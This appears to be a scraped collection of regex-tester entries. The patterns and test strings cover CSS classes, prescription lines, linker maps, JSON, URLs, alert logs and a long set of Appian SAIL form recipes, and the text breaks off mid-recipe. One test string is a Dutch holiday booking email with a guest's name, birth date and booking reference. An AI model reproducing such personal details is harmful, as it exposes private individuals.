type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"b5bcf2eba4","applicationID":"4491457","transactionName":"YwFXZhRYVhAEVUZcX1pLYEAPFlkTFRhCXUA=","queueTime":0,"applicationTime":128,"ttGuid":"","agentToken":"","userAttributes":"","errorBeacon":"bam.nr-data.net","agent":"js-agent.newrelic.com\/nr-686.min.js"}</script></body> </html> | author from tag | 2015-11-11T10:20:58.000Z |
|
class=([^=]*)([^(a-z|A-Z|0-9|\-|_)])btn("|([^(a-z|A-Z|0-9|\-|_)]).*") | <a href="tel:{{ message.contact_phone }}" data-message-phone-btn class="bottom-bar__btn"><i class="mypro-icon mypro-icon-phone"></i><br>{{ _("Appeler") }}</a>
<a href="sms:{{ message.contact_phone }}&body={{ body|urlencode }}" data-message-sms-btn class="bottom-bar__btn hide-for-medium-up"><i class="mypro-icon mypro-icon-sms"></i><br>{{ _("SMS") }}</a>
| CSS clas contains | 2016-08-17T06:38:36.000Z |
|
identificadores | [A-Za-z].[A-Za-z0-9]* | 1a
a1
| lista1 | 2016-09-04T17:47:47.000Z |
Kostenoverzicht[\n|\r]([.\n\d\s\w\S]+)[\n|\r]Met | Goedendag
Boekingsnummer =
Met vriendelijke groeten
Serviceteam
Van: benelux@bungalow.eu <benelux@bungalow.eu>
Verzonden: vrijdag 20 mei 2016 22:32
Aan: PVCP, CCCsupport NL; benelux@bungalow.eu
Onderwerp: BEVESTIGING VAN UW RESERVERING [LAST MINUTE] 20-5-2016
Geachte heer TO-SP,
Wij willen u vragen hierbij de ontvangst van deze reservering voor de desbetreffende huurprijs en periode aan ons te bevestigen, door op de onderstaande link te klikken. Vermijd problemen, houd uw kalender goed bij. Het is uw verantwoordelijkheid als verhuurder om de prijzen en beschikbaarheid actueel te houden. Mocht er onverhoopt in onderstaande boeking een verschil in prijs en/of beschikbaarheid zijn, neemt u dan alvorens te bevestigen contact op met uw accountmanager. Nadat u op onderstaande link geklikt heeft, worden de reisdocumenten aan de huurder gezonden, wij vragen u daarom z.s.m. uw reservering(en) te bevestigen. Alvast bedankt!
Klikt u hier om te bevestigen. Klik hier om te annuleren
Boeking
Reservering
XW4V3G
Verblijf
Aankomst:
18 juli 2016
Vertrek:
22 juli 2016
Accommodatie:
[BN55706] OD595 Select 4p
Oostduinkerke
Belgie,
tot 4 personen
Reisgezelschap
Volwassenen van 21 t/m 49 jaar
2
Baby's t/m 2 jaar
1
Kinderen van 3 t/m 4 jaar
1
Extra's
Huisdier
0
Gast
Naam
Leony Dokter
Land waar u woont:
Nederland
Volwassenen van 21 t/m 49 jaar
04-07-1983
Opmerkingen
Kostenoverzicht
Totaalbedrag:
€ 829.00
Toeristenbelasting:
€ 44.80
Bedlinnen:
€ 30.00
Bedlinnenpakket
€ 22.50
Handdoeken
€ 18.00
Kinderdekbedpakket
€ 9.75
Onze commissie:
€ -143.11
Totaalbedrag:
€ 810.94
Ter plaatse te betalen
Totaalbedrag:
€ 0.00
Met vriendelijke groet,
Uw Bungalow.Net Team
E-mail: info@bungalow.net
Tel: +31 383330101 | BUNGALOW NL MODEL V 2 PRICE CAPTURE | 2016-06-08T11:38:27.000Z |
|
<p>(<i>|<strong>)*<img.*<\/p> | <p><img class="mceItem_breakpoint" src="></p>
<h4>Platzteller</h4>
<p>Der Platzteller, auf dem Vorspeisen- und Suppenteller rechts daneben</p>
<p><i><img class="mceItem_breakpoint" src="" /></i></p>
<p><strong><img class="mceItem_breakpoint" src=""></strong></p> | mceItem_breakpoint | 2015-04-14T14:11:49.000Z |
|
Recognizes a line of text in a medical prescription.
Change log:
2.0 - Recognizes medication names composed of two or more words | ([\w+\s]+)\s([\d]+)(%|\w+)\s(\w+)\s(\w+)\sx\s(\d)\/(\d+) | calamine lotion 1% aaa od x 2/52 | Presciption line 2.0 | 2016-01-21T23:47:51.000Z |
([\.\w\?]+)\s+([\dABCDEF]+) - ([\dABCDEF]+)\s+([\dABCDEF]+) | .noinit 00001000 - 00001012 13 DATA (1 bytes space 00001013 - 00001013)
.ramcode 00001014 - 000017CB 7B8 DATA
.bss 000017CC - 00002A6A 129F DATA (1 bytes space 00002A6B - 00002A6B)
.data 00002A6C - 00002B35 CA DATA
WARNING: Non-dotted segment name DSPSEGMENT2.DRIVER120
DSPSEGMENT2.DRIVER120 00002B36 - 00002B3D 8 DATA
.ISOBUFFERS 00002B3E - 00002CBD 180 DATA
.uart 00002CBE - 00002DBD 100 DATA (562 bytes space 00002DBE - 00002FEF)
.qspidata 00002FF0 - 00002FFF 10 DATA
.icache 00003000 - 00003FFF 1000 DATA (20480 bytes space 00004000 - 00008FFF)
.rsstack0 00009000 - 000092FF 300 DATA
.rsmails0 00009300 - 000096FF 400 DATA
.trace 00009700 - 000098FF 200 DATA | rtxmap | 2015-12-15T13:39:01.000Z |
|
([:\[,])(?![+-]?\d+\.?\d*)(?!false|true)(?!".*?")([^\{\[\r\n]*?)([,\]\}]) | "bla":12.0,
"bla":+12.0,
"bla":-12.0,
"bla":+12,
"bla":false,
"bla":true,
"bla":+12.0.0,
"bla":"string",
"bla":path,
"bla":pathWith0.2,
"bla":,
"bla":{"inner":false,"bli":"s","blu":path},
"bla":[path1,path2,path3},
| json make strict | 2017-04-03T14:53:27.000Z |
|
^https:\/\/(((www|staging)\.fanball\.com\/lobby\/?(\?.*)?$)|fanball-qa\.shub\.dog\/lobby\/?(\?.*)?$) | https://www.fanball.com/
https://www.fanball.com/lobby
https://www.fanball.com/lobby/
https://www.fanball.com/lobby/blah
https://www.fanball.com/lobby/?foo=bar
https://staging.fanball.com/
https://staging.fanball.com/lobby
https://staging.fanball.com/lobby/
https://staging.fanball.com/lobby/blah
https://staging.fanball.com/lobby/?foo=bar
https://fanball-qa.shub.dog/
https://fanball-qa.shub.dog/lobby
https://fanball-qa.shub.dog/lobby/
https://fanball-qa.shub.dog/lobby/blah
https://fanball-qa.shub.dog/lobby/?foo=bar | Fanball -- Lobby | 2018-08-28T16:14:28.000Z |
|
Usage of [named capture group](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_Expressions/Groups_and_Backreferences#:~:text=substring%20matching%20the-,Named%20capture%20group,-specified%20by%20%3CName). | echo: (?<sound>\S+)(?:(?<lostAndNoise>.+)(?<echo>\k<sound>))+ | echo: yahoo yaha yaho ah | Echo | 2022-07-22T03:36:28.000Z |
The username should be at least 2 characters long, can have lower and uppercase letters, and can only have numbers in the end. | ^[a-z][a-z]+\d*$ | erikson675 | Check for username | 2018-08-22T20:31:03.000Z |
(?P<type>VIDEO)(?:::)(?P<desc>[\w#()/-]*)? | VIDEO::INEOQUEST_SWITCH_A | VIDEO | 2020-02-04T19:48:55.000Z |
|
(?P<hit_count>"hit_count"\s*:\s*"\{\\\"(?P<group_by>[^\\\"]+)\\\":\{(?:\\\"([^\\\"]+)\\\":([0-9]+))?(?:,\\\"([^\\\"]+)\\\":([0-9]+))?(?:,\\\"([^\\\"]+)\\\":([0-9]+))?(?:,\\\"([^\\\"]+)\\\":([0-9]+))?(?:,\\\"([^\\\"]+)\\\":([0-9]+))?(?:,\\\"([^\\\"]+)\\\":([0-9]+))?\}\}") | {"integration_text":"A Coralogix alert has been triggered!","alert_url":"https://Medigate.coralogix.com/#/insights?id=00270770-5eed-11eb-91d9-fd643179e246","alert_subsystem":"Multiple Subsystems","alert_severity":"INFO","alert_id":"3f99f720-5afe-11eb-94ee-09d1be14b22b","alert_application":"Multiple Applications","hit_count":"{\"host.hostname\":{\"ksbl-liestal-collection-laufen\":27,\"quiron-hev-collection\":27,\"klinikumdo-main-collection\":16,\"zgks-zug-collection\":1}}","alert_name":"Medparser KA"}
{"integration_text":"A Coralogix alert has been triggered!","alert_url":"https://Medigate.coralogix.com/#/insights?id=cc3da9c0-5eef-11eb-8c43-5b48837995a8","alert_subsystem":"Multiple Subsystems","alert_severity":"INFO","alert_id":"7097bde0-5b0c-11eb-8a52-29a11019991e","alert_application":"Multiple Applications","hit_count":"{\"host.hostname\":{\"chtourcoing-main-analysis\":6,\"mannheimu-main-analysis\":6,\"clalit-soroka-analysis\":5,\"maastrichtu-main-analysis\":5,\"ntu-taipei-analysis\":5}}","alert_name":"Medalert Activity KA"}
| rule for parsing group by alert log events with send log webhook | 2021-01-26T07:44:18.000Z |
|
if you use the service you may want to know a state of some responses | ^(?'stat'[a-zA-Z]*)|(?'ip'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})|(?'desc'was found on a blacklist|has not changed)|$ | Updated ad.ip.lc to 93.184.216.34 in 0.041 seconds
ERROR: Address 93.184.216.34 has not changed.
ERROR: The IP 98.150.108.228 was found on a blacklist - please contact an administrator if you believe this is in error | freedns.afraid.org/dynamic/ | 2015-07-11T13:18:03.000Z |
http://stackoverflow.com/questions/32650744/google-analytics-content-grouping-regex-fix | access-guide/([^/]*(?:university|universities|college|colleges)[^/]*) | http://www.disabledgo.com/access-guide/the-university-of-manchester/176-waterloo-place-2
http://www.disabledgo.com/access-guide/kingston-university/coombehurst-court-2
http://www.disabledgo.com/access-guide/kings-college-london/franklin-wilkins-building-2
http://www.disabledgo.com/access-guide/redbridge-college/brook-centre-learning-resource-centre | Google Analytics - Content grouping - Regex fix | 2015-09-23T15:04:26.000Z |
(category: sailrecipe\n\---)(\n\n\#\#\# Goal \#\#\#\n)(.*?)(\n\n) |
---
layout: basic
title: Configure a Button that Skips Validation (a Cancel Button)
category: sailrecipe
---
### Goal ###
Display a button that submits the form even if the form contains validation errors such as a blank required field or an invalid text.
### Expression ###
{% highlight sail %}
=load(
local!a,
local!b: "abc@",
local!cancel: false,
a!formLayout(
label: "SAIL Example: Cancel Button",
firstColumnContents: {
a!textField(
label: "Text 1",
value: local!a,
saveInto: local!a,
required: true
),
a!textField(
label: "Text 2",
instructions: "@ is an invalid character",
value: local!b,
saveInto: local!b,
validations: if(find("@", local!b)=0, null, "Invalid character!")
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit",
style: "PRIMARY"
),
secondaryButtons: a!buttonWidgetSubmit(
label: "Cancel",
confirmMessage: "Are you sure?",
value: true,
saveInto: local!cancel,
skipValidation: true
)
)
)
)
{% endhighlight %}
By using the `secondaryButtons` configuration, we’ve added a Cancel button to the left side of the form. On mobile devices, secondary buttons show up below the primary buttons. We've also configured the Cancel button to display a confirmation message in case the user clicks it by accident. Finally, we styled the Submit button as `"PRIMARY"`.
To see that the form goes away even when there are validation errors, we will test this recipe in process.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: a (Text), b (Text), cancel (Boolean)
1. Remove the `load()` function
1. Delete local variables: `local!a`, `local!b`, `local!cancel`
1. In your expression, replace:
- `local!a` with `ri!a`
- `local!b` with `ri!b`
- `local!cancel` with `ri!cancel`
1. In your process model, create variables: aaa (Text) with no value, bbb (Text) with value `"abc@"`, cancel (Boolean) with value `false`
1. On the **Process Start Form** tab in **Process Model Properties**, check the "Use an existing form" checkbox, click on "SAIL Form", and configure the SAIL Form as `=rule!sailRecipe(a: pv!aaa, b: pv!bbb, cancel: pv!cancel)`
1. Save and publish the process model.
1. Start a new process.
### Test it out ###
1. On the start form, click the "Submit" button without entering or modifying any of the field values. Notice that the form doesn't submit due to the presence of the validation messages.
- When testing offline, the form queues for submission but returns the validation messages when you go back online and the form attempts to submit.
1. Click the "Cancel" button without entering or modifying any of the field values. Notice that the form submits despite the invalid fields.
1. Enter a value in the required field and remove the "@" character from the second field. Now click the "Submit" button.
---
layout: basic
title: Display a Placeholder Text in a Dropdown
category: sailrecipe
---
### Goal ###
Display a placeholder text as the default option in a dropdown. If the dropdown is marked as required, the user must select a different option before proceeding.
### Expression ###
{% highlight sail %}
=load(
/* null is not a valid value when there's no placeholder */
local!a: 10,
local!b,
local!c,
a!formLayout(
label: "SAIL Example: Dropdown with Placeholder Text",
firstColumnContents: {
a!dropdownField(
label: "No Placeholder",
choiceLabels: {"Fruits", "Vegetables"},
choiceValues: {10, 20},
value: local!a,
saveInto: local!a,
required: true
),
a!dropdownField(
label: "With Placeholder (Optional)",
choiceLabels: {"Fruits", "Vegetables"},
placeholderLabel: "--- Select One ---",
choiceValues: {10, 20},
value: local!b,
saveInto: local!b
),
a!dropdownField(
label: "With Placeholder (Required)",
choiceLabels: {"Fruits", "Vegetables"},
placeholderLabel: "--- Select One ---",
choiceValues: {10, 20},
value: local!c,
saveInto: local!c,
required: true
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Click "Submit" without changing the selected values. Notice that the validation message only appears under the last dropdown field.
- When testing offline, the validation message only appears after you go back online and the form attempts to submit.
1. Select a value in the last dropdown field, and then click "Submit". Notice that there are no validation messages.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: a (Number Integer), b (Number Integer), c (Number Integer)
1. Remove the `load()` function
1. Delete local variables: `local!a`, `local!b`, `local!c`
1. In your expression, replace:
- `local!a` with `ri!a`
- `local!b` with `ri!b`
- `local!c` with `ri!c`
1. In your process model, create variables: foodTypeA (Number Integer) with value `10`, foodTypeB (Number Integer) with with value `=null`, foodTypeC (Number Integer) with with value `=null`
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(a: ac!foodTypeA, b: ac!foodTypeB, c: ac!foodTypeC)`
- On a start form: `=rule!sailRecipe(a: pv!foodTypeA, b: pv!foodTypeB, c: pv!foodTypeC)`
### Notable implementation details ###
- Process variables of type Number (Integer) default to 0 rather than null, so we have to explicitly set them to null instead of leaving the value blank.
---
layout: basic
title: Configure a Dropdown Field to Save a CDT
category: sailrecipe
---
### Goal ###
When using a dropdown to select values from the database, or generally from an array of CDT values, configure it to save the entire CDT value rather than just a single field.
### Expression ###
{% highlight sail %}
=load(
local!foodTypes: {
{id: 1, name: "Fruits"},
{id: 2, name: "Vegetables"}
},
local!selectedFoodType,
a!formLayout(
label: "SAIL Example: Dropdown with CDT",
firstColumnContents: {
a!dropdownField(
label: "Food Type",
instructions: "Value saved: " & local!selectedFoodType,
choiceLabels: index(local!foodTypes, "name", null),
placeholderLabel: "--- Select Food Type ---",
/* choiceValues gets the CDT/dictionary rather than the ids */
choiceValues: local!foodTypes,
value: local!selectedFoodType,
saveInto: local!selectedFoodType
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Select the choices in the dropdown and notice that the instructions are updated to reflect the value of the variable that is saved, in this case the entire CDT.
- When testing offline, the instructions do not update, but the same value is saved.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface input: cdt (Any Type)
1. Delete local variable: `local!selectedFoodType`
1. In your expression, replace:
- `local!selectedFoodType` with `ri!cdt`
- The dictionary array (value of `local!foodTypes`) with a CDT array
1. In your process model, create a variable called cdt that is of the same type as the CDT array with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(cdt: ac!cdt)`
- On a start form: `=rule!sailRecipe(cdt: pv!cdt)`
### Notable implementation details ###
- Saving the entire CDT saves you from having to store the id and query the entire object separately when you need to display attributes of the selected CDT elsewhere on the form.
- When you configure your dropdown, replace the value of `local!foodTypes` with a CDT array that is the result of `a!queryEntity()` or `queryrecord()`. These functions allow you to retrieve only the fields that you need to configure your dropdown.
- See also: [SAIL Design](SAIL_Design.md)
- This technique is well suited for selecting lookup values for nested CDTs. Let's say you have a project CDT and each project can have zero, one, or many team members. Team members reference the employee CDT. Use this technique when displaying a form to the end user for selecting team members.
---
layout: basic
title: Configure a Dropdown with an Extra Option for Other
category: sailrecipe
---
### Goal ###
Show a dropdown that has an "Other" option at the end of the list of choices. If the user selects "Other", show a required text field.
We describe two approaches: the first populates a dropdown list with parallel arrays of data while the second populates the list with an array of CDT values. Each approach has an additional expression that is suited for offline use.
**Expression 1:** This expression shows a dropdown whose option labels and values come from parallel arrays.
{% highlight sail %}
=load(
local!choiceLabels: {"Fruits", "Vegetables", "Other"},
local!choiceValues: {10, 20, -1},
local!selectedFoodType: tointeger(null),
local!other,
a!formLayout(
label: "SAIL Example: Dropdown from parallel arrays with Other option",
firstColumnContents: {
a!dropdownField(
label: "Food Type",
instructions: "Value saved: " & local!selectedFoodType,
choiceLabels: local!choiceLabels,
placeholderLabel: "--- Select Food Type ---",
choiceValues: local!choiceValues,
value: local!selectedFoodType,
saveInto: local!selectedFoodType
),
if(
local!selectedFoodType = -1,
a!textField(
label: "Other",
value: local!other,
saveInto: local!other,
required: true
),
{}
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit",
value: null,
saveInto: if(
or(isnull(local!selectedFoodType), local!selectedFoodType = -1),
/* Clear value if user selected Other `*/
local!selectedFoodType,
/*` Clear value if user selected an available option */
local!other
)
)
)
)
)
{% endhighlight %}
**Expression 1 (Offline):** This expression shows how to modify the above expression for offline use.
{% highlight sail %}
=load(
local!choiceLabels: {"Fruits", "Vegetables", "Other"},
local!choiceValues: {10, 20, -1},
local!selectedFoodType: tointeger(null),
local!other,
a!formLayout(
label: "SAIL Example: Dropdown from parallel arrays with Other option",
firstColumnContents: {
a!dropdownField(
label: "Food Type",
instructions: "Value saved: " & local!selectedFoodType,
choiceLabels: local!choiceLabels,
placeholderLabel: "--- Select Food Type ---",
choiceValues: local!choiceValues,
value: local!selectedFoodType,
saveInto: local!selectedFoodType
),
a!textField(
label: "Other",
instructions: "Required if Food Type is Other",
value: local!other,
saveInto: local!other,
required: local!selectedFoodType = -1
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit",
value: null,
saveInto: if(
or(isnull(local!selectedFoodType), local!selectedFoodType = -1),
/* Clear value if user selected Other `*/
local!selectedFoodType,
/*` Clear value if user selected an available option */
local!other
)
)
)
)
)
{% endhighlight %}
**Expression 2:** This expression shows a dropdown whose options come from a CDT array, to which we append an extra entry for the "Other" option.
{% highlight sail %}
=load(
local!foodTypes: {
{id: 1, name: "Fruits"},
{id: 2, name: "Vegetables"}
},
local!choices: append(local!foodTypes, {id: -1, name: "Other"}),
local!selectedFoodType,
local!other,
a!formLayout(
label: "SAIL Example: Dropdown from CDT array with Other option",
firstColumnContents: {
a!dropdownField(
label: "Food Type",
instructions: "Value saved: " & local!selectedFoodType,
choiceLabels: index(local!choices, "name", {}),
placeholderLabel: "--- Select Food Type ---",
choiceValues: local!choices,
value: local!selectedFoodType,
saveInto: local!selectedFoodType
),
if(
and(
not(isnull(local!selectedFoodType)),
tointeger(local!selectedFoodType.id) = -1
),
a!textField(
label: "Other",
value: local!other,
saveInto: local!other,
required: true
),
{}
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit",
value: null,
saveInto: if(
or(
isnull(local!selectedFoodType),
tointeger(local!selectedFoodType.id) = -1
),
/* Clear value if user selected Other `*/
local!selectedFoodType,
/*` Clear value if user selected an available option */
local!other
)
)
)
)
)
{% endhighlight %}
**Expression 2 (Offline):** This expression shows how to modify the above expression for offline use.
{% highlight sail %}
=load(
local!foodTypes: {
{id: 1, name: "Fruits"},
{id: 2, name: "Vegetables"}
},
local!choices: append(local!foodTypes, {id: -1, name: "Other"}),
local!selectedFoodType,
local!other,
a!formLayout(
label: "SAIL Example: Dropdown from CDT array with Other option",
firstColumnContents: {
a!dropdownField(
label: "Food Type",
instructions: "Value saved: " & local!selectedFoodType,
choiceLabels: index(local!choices, "name", {}),
placeholderLabel: "--- Select Food Type ---",
choiceValues: local!choices,
value: local!selectedFoodType,
saveInto: local!selectedFoodType
),
a!textField(
label: "Other",
value: local!other,
saveInto: local!other,
required: and(
not(isnull(local!selectedFoodType)),
tointeger(local!selectedFoodType.id) = -1
)
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit",
value: null,
saveInto: if(
or(
isnull(local!selectedFoodType),
tointeger(local!selectedFoodType.id) = -1
),
/* Clear value if user selected Other `*/
local!selectedFoodType,
/*` Clear value if user selected an available option */
local!other
)
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Select "Other" in the dropdown, enter a value and click on the Submit button.
1. Select "Fruits" in the dropdown and click on the Submit button.
1. Select "Other" in the dropdown, don't enter any value, and click on the Submit button. Notice that the form can't be submitted unless the user enters a value in the text field.
1. When the text field is blank, select "Fruits" from the dropdown to hide the text field. You can successfully submit even though the local!other variable is null.
### To write your data to process ###
*Expression 1*
1. Save your interface as sailRecipe
1. Create interface inputs: selectedFoodType (Number Integer), other (Text)
1. Delete local variables: `local!selectedFoodType`, `local!other`
1. In your expression, replace:
- `local!selectedFoodType` with `ri!selectedFoodType`
- `local!other` with `ri!other`
1. In your process model, create variables: selectedFoodType (Number Integer) with no value, other (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(selectedFoodType: ac!selectedFoodType, other: ac!other)`
- On a start form: `=rule!sailRecipe(selectedFoodType: pv!selectedFoodType, other: pv!other)`
*Expression 2*
1. Save your interface as sailRecipe
1. Create your CDT with at least 2 fields, one for the selected id, and one for the label to show in the dropdown.
1. Create interface inputs: cdt (Any Type), other (Text)
1. Delete local variables: `local!selectedFoodType`, `local!other`
1. In your expression, replace:
- `local!selectedFoodType` with `ri!cdt`
- `tointeger(local!selectedFoodType.id)` with `ri!cdt.id`
- `local!other` with `ri!other`
- The value of `local!foodTypes` with a CDT array
1. If the id field in your CDT is not an integer, also replace `-1` with a value of the same type as your id field.
1. In your process model, create a variable called `cdt` that is of the same type as the CDT array and a variable called `other` of type Text
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(cdt: ac!cdt, other: ac!other)`
- On a start form: `=rule!sailRecipe(cdt: pv!cdt, other: pv!other)`
### Notable implementation details ###
- Notice that we cleared out the opposite variable upon submission so that only one variable gets updated. That is, if the user filled out the "Other" field and then switched the dropdown back to an available option, `local!other` would be set to null on submission of the form.
- When you configure your dropdown, replace the value of local!foodTypes with `a!queryEntity()` or `queryrecord()` to return your array of options.
---
layout: basic
title: Configure Cascading Dropdowns
category: sailrecipe
---
### Goal ###
Show different dropdown options depending on the user selection.
### Expression ###
{% highlight sail %}
=load(
/* Initialize local!make to a null integer because local variables have no type
* and the comparison local!make=1 would fail.
* When saving into a process variable or a node input, you don't need to initialize
* it in this way because the variable will have the correct type. */
local!make: tointeger(null),
local!model,
a!formLayout(
label: "SAIL Example: Cascading Dropdowns",
firstColumnContents: {
a!dropdownField(
label: "Make",
choiceLabels: {"Subaru", "Toyota"},
placeholderLabel: "--- Select Make ---",
choiceValues: {1, 2},
value: local!make,
saveInto: {
local!make,
a!save(local!model, null)
}
),
with(
local!cascadingChoices: if(
local!make=1,
{{id: 1, label: "Forester"}, {id: 2, label: "Legacy"}},
{{id: 10, label: "Camry" }, {id: 20, label: "Yaris" }}
),
a!dropdownField(
label: "Model",
choiceLabels: local!cascadingChoices.label,
placeholderLabel: "--- Select Model ---",
choiceValues: local!cascadingChoices.id,
value: local!model,
saveInto: local!model,
disabled: isnull(local!make)
)
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Select "Subaru" in the first dropdown. Notice that the second dropdown is now enabled and shows the Subaru models. Select a model.
1. Next, change the first dropdown to "Toyota" and notice that the second dropdown now shows the placeholder label so that the user can select a model applicable to "Toyota".
### Notable implementation details ###
The value of the second dropdown is reset to null when the first dropdown's value changes to ensure that the value of the selected model always matches what the user sees in the UI.
### Offline ###
Since components cannot be added dynamically when offline, you should include all of the dropdown fields initially in case they are needed. To support this use case for offline, we will create a different expression with a supporting rule.
Create expression rule `ucCascadingDropdownEach` with the following rule inputs:
- makeChoices (Any Type)
- make (Text)
- model (Text)
- index (Integer)
Enter the following definition for the rule:
{% highlight sail %}
=load(
local!modelChoices: if(
ri!index=1,
{{id: 1, label: "Forester"}, {id: 2, label: "Legacy"}},
{{id: 10, label: "Camry"}, {id: 20, label: "Yaris"}}
),
local!selectedModel,
a!dropdownField(
label: ri!makeChoices[ri!index].label & " Model",
choiceLabels: local!modelChoices.label,
placeholderLabel: "--- Select " & ri!makeChoices[ri!index].label & " Model ---",
choiceValues: local!modelChoices.id,
value: local!selectedModel,
saveInto: {
local!selectedModel,
a!save(ri!model, if(ri!make=ri!makeChoices[ri!index].id, save!value, null))
},
validations: if(
or(ri!make=ri!makeChoices[ri!index].id, isnull(local!selectedModel)),
null,
"This field must be left blank because it does not correspond to your selected Make"
),
required: ri!make=ri!makeChoices[ri!index].id
)
)
{% endhighlight %}
Now create your main interface with the following definition:
{% highlight sail %}
=load(
local!makeChoices: {{id: 1, label: "Subaru"}, {id: 2, label: "Toyota"}},
local!make,
local!model,
a!formLayout(
label: "SAIL Example: Cascading Dropdowns (Offline)",
firstColumnContents: {
a!dropdownField(
label: "Make",
placeholderLabel: "--- Select Make ---",
choiceLabels: local!makeChoices.label,
choiceValues: {1, 2},
value: local!make,
saveInto: local!make
),
a!applyComponents(
function: rule!ucCascadingDropdownEach(makeChoices: local!makeChoices, make: local!make, model: local!model, index: _),
array: 1+enumerate(count(local!makeChoices))
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. There are now 3 dropdowns available to the user immediately.
- If the user selects a make but does not select a model for that make, he will encounter a validation message when the form submits when he is back online.
- Similarly, if the user selects a model for a make not corresponding to his selected make, he will encounter a validation message when the form submits when he is back online.
### Notable implementation details ###
A validation message was used when the user selects a model that does not correspond to the selected make to get the user to change the invalid data in the case of a mistake. To simply discard the invalid data on submission, you can remove this validation message.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: make (Number Integer), model (Number Integer)
1. Remove the `load()` function
1. Delete local variables: `local!make`, `local!model`
1. In your expression, replace:
- `local!make` with `ri!make`
- `local!model` with `ri!model`
1. In your process model, create variables: make (Number Integer), model (Number Integer)
- On a task form, create node inputs
- On a start form, create process parameters with value `=null`
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(make: ac!make, model: ac!model)`
- On a start form: `=rule!sailRecipe(make: pv!make, model: pv!model)`
---
layout: basic
title: Configure a Boolean Checkbox
category: sailrecipe
---
### Goal ###
Configure a checkbox that saves a boolean (true/false) value, and validate that the user selects the checkbox before submitting a form.
### Expression ###
{% highlight sail %}
=load(
local!userAgreed,
a!formLayout(
label: "SAIL Example: Required Boolean Checkbox",
firstColumnContents: {
a!checkboxField(
label: "Acknowledge",
choiceLabels: {"I agree to the terms and conditions."},
choiceValues: {true},
value: local!userAgreed,
saveInto: local!userAgreed,
required: true,
requiredMessage: "You must check this box!"
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label:"Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Click "Submit" without selecting the checkbox. Notice that the custom message shows up. Appian recommends using a custom required message when you have a single required checkbox.
1. Select the checkbox and click "Submit".
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface input: userAgreed (Boolean)
1. Remove the `load()` function
1. Delete local variable: `local!userAgreed`
1. In your expression, replace:
- `local!userAgreed` with `ri!userAgreed`
1. In your process model, create variable: userAgreed (Boolean) with no value
- On a task form, create node input
- On a start form, create process parameter
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(userAgreed: ac!userAgreed)`
- On a start form: `=rule!sailRecipe(userAgreed: pv!userAgreed)`
---
layout: basic
title: Make a Component Required Based on a User Selection
category: sailrecipe
---
### Goal ###
Make a paragraph component conditionally required based on the user selection.
*Note:* This design pattern is not recommended for offline interfaces because the conditional requiredness of a field based on user selection requires a connection to the server.
### Expression ###
{% highlight sail %}
=load(
local!isMinor,
local!comments,
a!formLayout(
label: "SAIL Example: Conditionally Required Field",
firstColumnContents: {
a!checkboxField(
label: "Is Minor",
instructions: "Value saved: " & local!isMinor,
choiceLabels: "Check the box if the patient is a minor",
choiceValues: {true},
value: local!isMinor,
saveInto: local!isMinor
),
a!paragraphField(
label: "Comments",
value: local!comments,
saveInto: local!comments,
required: local!isMinor
)
},
buttons: a!buttonLayout(
primaryButtons: a!buttonWidgetSubmit(
label: "Submit"
)
)
)
)
{% endhighlight %}
### Test it out ###
1. Select the *Is Minor* checkbox. Notice that the *Comments* field is required. If the checkbox is selected but no comments are entered, the user cannot submit the form.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: isMinor (Boolean), comments (Text)
1. Remove the `load()` function
1. Delete local variables: `local!isMinor`, `local!comments`
1. In your expression, replace:
- `local!isMinor` with `ri!isMinor`
- `local!comments` with `ri!comments`
1. In your process model, create variables: isMinor (Boolean) with no value, comments (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(isMinor: ac!isMinor, comments: ac!comments)`
- On a start form: `=rule!sailRecipe(isMinor: pv!isMinor, comments: pv!comments)`
---
layout: basic
title: Set the Default Value Based on a User Input
category: sailrecipe
---
### Goal ###
Set the default value of a variable based on what the user enters in another component.
*Note:*
- This design pattern is not recommended for offline interfaces because the conditional setting of a value based on user input requires a connection to the server.
- This example only applies when the default value is based on the user's input in another component. See [Set the Default Value of an Input on a Task Form](#Set_the_Default_Value_of_an_Input_on_a_Task_Form) recipe when the default value must be set as soon as the form is displayed and without requiring the user to interact with the form.
### Expression ###
